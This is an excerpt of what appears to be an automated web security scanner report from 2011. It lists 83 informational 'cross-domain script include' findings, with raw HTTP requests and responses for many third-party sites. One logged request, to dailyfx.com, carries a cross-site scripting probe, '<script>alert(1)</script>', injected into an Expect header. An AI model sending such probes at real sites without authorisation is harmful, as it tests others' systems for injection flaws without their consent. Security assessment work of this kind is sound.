<dd><a href="http://maysville.upickem.net/engine/splash.aspx?contestid=27231&cid=todaysdeal" rel="external">'+upickemDeals[0][0]+'</a>
...[SNIP]...
<dd><a href="http://maysville.upickem.net/engine/splash.aspx?contestid=27231&cid=todaysdeal" rel="external">'+upickemDeals[0][1]+'</a>
...[SNIP]...
</div>';
htmlString += '<a href="http://maysville.upickem.net/engine/splash.aspx?contestid=27231&cid=todaysdeal" rel="external">Register Here</a>
...[SNIP]...

20. Cross-domain script include previous next
There are 83 instances of this issue:

http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js
http://www.2-clicks-stamps.com/favicon.ico
http://www.610wtvn.com/favicon.ico
http://www.aiche.org/favicon.ico
http://www.am570radio.com/favicon.ico
http://www.atomiclearning.com/favicon.ico
http://www.boyvipdream.com/favicon.ico
http://www.brighthorizons.com/favicon.ico
http://www.buymebeauty.com/favicon.ico
http://www.bvonstyle.com/favicon.ico
http://www.callsource.com/favicon.ico
http://www.cavtel.com/favicon.ico
http://www.click-now.net/favicon.ico
http://www.coinmerc.com/favicon.ico
http://www.conscallhome.com/favicon.ico
http://www.crystal-co.com/favicon.ico
http://www.dailyfx.com/favicon.ico
http://www.deguate.com/favicon.ico
http://www.donbest.com/favicon.ico
http://www.edgarsnyder.com/favicon.ico
http://www.extrabux.com/favicon.ico
http://www.facebook.com/plugins/recommendations.php
http://www.fateback.com/favicon.ico
http://www.findire.com/favicon.ico
http://www.foodsaver.com/favicon.ico
http://www.fortunecity.co.uk/favicon.ico
http://www.getfreedental.com/favicon.ico
http://www.gizmodefenderstore.com/favicon.ico
http://www.grayline.com/favicon.ico
http://www.greatnow.com/favicon.ico
http://www.gtop100.com/favicon.ico
http://www.halldata.com/favicon.ico
http://www.herehard.tv/favicon.ico
http://www.heresquirt.tv/favicon.ico
http://www.holdonsecuritysite.com/favicon.ico
http://www.ipodarcade.com/favicon.ico
http://www.journalofaccountancy.com/favicon.ico
http://www.maysville-online.com/content/
http://www.maysville-online.com/favicon.ico
http://www.mnnews.com/favicon.ico
http://www.monsterjam.com/favicon.ico
http://www.motorracingnetwork.com/favicon.ico
http://www.mrclean.com/favicon.ico
http://www.mylovedanal.tv/favicon.ico
http://www.mylovedasses.tv/favicon.ico
http://www.mylovedrubber.com/favicon.ico
http://www.mysubtitles.com/favicon.ico
http://www.mytoolstore.com/favicon.ico
http://www.nationnews.com/favicon.ico
http://www.netfit.co.uk/favicon.ico
http://www.newholdonsecurity.com/favicon.ico
http://www.playingforchange.com/favicon.ico
http://www.prettynylonfeet.com/favicon.ico
http://www.prosolutionpills.com/favicon.ico
http://www.rb-hosting.de/favicon.ico
http://www.restaurantrow.com/favicon.ico
http://www.ricedelman.com/favicon.ico
http://www.rv-clubs.us/favicon.ico
http://www.sanfranrecruiter.com/favicon.ico
http://www.schoolexpress.com/favicon.ico
http://www.sharethatboy.com/favicon.ico
http://www.simplybestcoupons.com/favicon.ico
http://www.socializr.com/favicon.ico
http://www.specialops.org/favicon.ico
http://www.squirt-disgrace.net/favicon.ico
http://www.stopsacidreflux.com/favicon.ico
http://www.tahoedailytribune.com/favicon.ico
http://www.tcoasttalk.com/favicon.ico
http://www.tempcredit.com/favicon.ico
http://www.teriskitchen.com/favicon.ico
http://www.ticketleap.net/favicon.ico
http://www.tireteam.com/favicon.ico
http://www.torontolife.com/favicon.ico
http://www.uwstout.edu/favicon.ico
http://www.vc.edu/favicon.ico
http://www.visitsouth.com/favicon.ico
http://www.vivalagames.com/favicon.ico
http://www.voa.org/favicon.ico
http://www.wdasfm.com/favicon.ico
http://www.wendoverfun.com/favicon.ico
http://www.womensenews.org/favicon.ico
http://www.xcomment.com/favicon.ico

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

20.1. http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N763.no_url_specifiedOX2462/B4639841.8

Issue detail

The response dynamically includes the following scripts from other domains:

http://c.betrad.com/surly.js?;ad_w=300;ad_h=250;coid=279;nid=1228;crid=179
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N763.no_url_specifiedOX2462/B4639841.8;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~503597~2587~54012~108044~94417~3~0~0~maysville-online.com~2~8~1~0~2~1~PEiOeaHGRLH4quYZj5mgESimscR103Gq~16~2~gDLdEnJ4dUI3~RiC6i2pCL3Ub~1~0~1~~;ord=1771002466? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

20.2. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/cm.rev_lee/;sz=300x250;ord=' + Math.random() + '?

Request

Response

20.3. http://www.2-clicks-stamps.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.2-clicks-stamps.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2-clicks-stamps.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:58:53 GMT
Server: Apache/2.2.17
Last-Modified: Fri, 09 Jan 2009 07:14:54 GMT
ETag: "2357-46007837eb780"
Accept-Ranges: bytes
Content-Length: 9047
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head><title>2-Clicks Stamps | 404 Page</title>

<meta http-equiv="Content-Language" content="en-us
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.4. http://www.610wtvn.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.610wtvn.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.610wtvn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3395352530 3395241841
X-Cache-Server: varnish01
Expires: Tue, 03 May 2011 11:40:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:40:29 GMT
Content-Length: 32618
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - News Talk 610 WTVN | Best Buckeye Coverage | Colu
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.5. http://www.aiche.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aiche.org
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aiche.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.6. http://www.am570radio.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.am570radio.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.am570radio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3394810906
X-Cache-Server: varnish01
Expires: Tue, 03 May 2011 11:24:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:24:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - AM 570 KLAC K-Los Angeles California/Orange Count
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.7. http://www.atomiclearning.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atomiclearning.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.3/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.2/effects.js
http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.atomiclearning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:15:56 GMT
Server: Apache
Content-Length: 41708
Set-Cookie: platform_session=0684a7b9b10d110d27b33995013bac6e15572167; domain=atomiclearning.com; path=/; HttpOnly
P3P: CP="CAO PSA OUR"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- served from pl
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://static.atomiclearning.com/eastwood/css/main.css" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.0.3/prototype.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.2/effects.js"></script>
...[SNIP]...

20.8. http://www.boyvipdream.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boyvipdream.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://stats.wordpress.com/e-201118.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boyvipdream.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:25:20 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.boyvipdream.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 11:25:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
</div>

<script src="http://stats.wordpress.com/e-201118.js" type="text/javascript"></script>
...[SNIP]...

20.9. http://www.brighthorizons.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brighthorizons.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brighthorizons.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 19 Feb 2010 17:59:32 GMT
Accept-Ranges: bytes
ETag: "09aca498db1ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
ws: 2
Date: Tue, 03 May 2011 11:23:29 GMT
Content-Length: 4246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.10. http://www.buymebeauty.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.buymebeauty.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/ga.js
https://seal.networksolutions.com/siteseal/javascript/siteseal.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buymebeauty.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.11. http://www.bvonstyle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bvonstyle.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/ads/adsWrapper.js
http://o.aolcdn.com/art/merge/?f=/entwire_bv/jquery-most-commented.js&f=/entwire_bv/jquery-affinity-slider.js&f=/entwire_bv/sns-form.js&f=/entwire_bv/onthe_radar.js&f=_media/music_en_us_js/jquery.globalsearchbox.js&f=_media/music_en_us_js/jquery.globalheader.js&expsec=31536000&ver=1
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.min.js&os=4

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bvonstyle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:43 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Tue, 03-May-2011 12:05:43 GMT; path=/
Content-Type: text/html
Content-Length: 10733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>BV on Style</title>
...[SNIP]...
</script>-->
   <script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
   <script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...

<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.min.js&os=4" type="text/javascript"></script>
<script src="http://o.aolcdn.com/art/merge/?f=/entwire_bv/jquery-most-commented.js&f=/entwire_bv/jquery-affinity-slider.js&f=/entwire_bv/sns-form.js&f=/entwire_bv/onthe_radar.js&f=_media/music_en_us_js/jquery.globalsearchbox.js&f=_media/music_en_us_js/jquery.globalheader.js&expsec=31536000&ver=1" type="text/javascript"></script>
...[SNIP]...

20.12. http://www.callsource.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.callsource.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?pub=callsource
https://lct.salesforce.com/sfga.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.callsource.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:36:25 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=jov8oessu7vsrk0posue5llb97; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Set-Cookie: bypassStaticCache=deleted; expires=Mon, 03-May-2010 11:36:24 GMT; path=/; httponly
Set-Cookie: bypassStaticCache=deleted; expires=Mon, 03-May-2010 11:36:24 GMT; path=/; httponly
Connection: close
Content-Type: text/html; charset="utf-8"
Content-Length: 18527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<base href="http://www.cal
...[SNIP]...
</ul>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=callsource"></script>
...[SNIP]...

<script src="https://lct.salesforce.com/sfga.js" type="text/javascript"></script>
...[SNIP]...

20.13. http://www.cavtel.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cavtel.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://ourbbbonline.bbb.org/Richmond/BBBOnlineSeal/20000655/bbbsealh2/0/
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en
https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cavtel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:31:08 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 15 Apr 2011 13:42:00 GMT
ETag: "4c004-1cde-4a0f534cb1a00"
Accept-Ranges: bytes
Content-Length: 7390
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Via: 1.1 cavtel.com

<!DOCTYPE html PUBLIC
"-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">

...[SNIP]...
<![endif]-->

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.2/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</p>

<script type="text/javascript" src="http://ourbbbonline.bbb.org/Richmond/BBBOnlineSeal/20000655/bbbsealh2/0/"></script>
...[SNIP]...

20.14. http://www.click-now.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.click-now.net
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.downloadbar.com/js/behavior.js
http://www.downloadbar.com/js/checkReviewForm.js
http://www.downloadbar.com/js/jquery.js
http://www.downloadbar.com/js/rating.js
http://www.downloadbar.com/js/selectbox.js
http://www.downloadbar.com/js/thickbox.js
http://www.downloadbar.com/js/xscript.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.click-now.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:49:12 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: _downloadBarCom=a3363fe1cf8e5323c49a3258eb0d0cef; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _downloadBarCom=12214117dd98b727f887a61691eb8a7f; path=/
Content-Type: text/html
Content-Length: 10393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://www.downloadbar.com/js/jquery.js"></script>
<script type="text/javascript" src="http://www.downloadbar.com/js/xscript.js"></script>
<script type="text/javascript" src="http://www.downloadbar.com/js/selectbox.js"></script>
<script type="text/javascript" src="http://www.downloadbar.com/js/checkReviewForm.js"></script>
<script type="text/javascript" src="http://www.downloadbar.com/js/thickbox.js"></script>
<script type="text/javascript" language="javascript" src="http://www.downloadbar.com/js/behavior.js"></script>
<script type="text/javascript" language="javascript" src="http://www.downloadbar.com/js/rating.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

20.15. http://www.coinmerc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.coinmerc.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://verify.authorize.net/anetseal/seal.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.coinmerc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:37:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 64847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<title>
...[SNIP]...
</script> <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...

20.16. http://www.conscallhome.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.conscallhome.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=www.conscallhome.com&size=M&use_flash=no&use_transparent=YES&lang=en

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=276976;expires=Thu, 25-Apr-2041 10:42:55 GMT;path=/
Set-Cookie: CFTOKEN=85670812;expires=Thu, 25-Apr-2041 10:42:55 GMT;path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:42:55 GMT
Content-Length: 13361



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.
...[SNIP]...
<div style="float:right; width:100px; text-align:right; padding-top:10px;">

<script src=https://seal.verisign.com/getseal?host_name=www.conscallhome.com&size=M&use_flash=no&use_transparent=YES&lang=en></script>
...[SNIP]...

20.17. http://www.crystal-co.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crystal-co.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crystal-co.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:50:57 GMT
Server: Apache
Last-Modified: Wed, 30 Dec 2009 15:26:35 GMT
ETag: "46f03-1e000-c38e60c0"
Accept-Ranges: bytes
Content-Length: 122880
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Content-Type: text/html

<head>

<meta name="keywords" content="Waterford Crystal, Tracy Porter, Lenox China, Wedgwood, Jasperware, Vera Wang, Waterford, Evolution, Marquis, Riedel, Reidel, Wedgewood, Jasper, Gorham, Lennox,
...[SNIP]...

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.18. http://www.dailyfx.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailyfx.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.fxcm.co.uk/script/fxcm_lib.js
http://static.fxcm.co.uk/tracking/common.js?site=dailyfx

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailyfx.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=86400
Age: 1918
Date: Tue, 03 May 2011 11:04:28 GMT
Last-Modified: Tue, 03 May 2011 10:32:30 GMT
Expires: Tue, 03 May 2011 11:07:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/design/fxcm/css/dfx.css" />
<script src="http://static.fxcm.co.uk/script/fxcm_lib.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="//static.fxcm.co.uk/tracking/common.js?site=dailyfx"></script>
...[SNIP]...

20.19. http://www.deguate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deguate.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.google-analytics.com/urchin.js
http://xslt.alexa.com/site_stats/js/s/a?url=www.deguate.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.deguate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:27:17 GMT
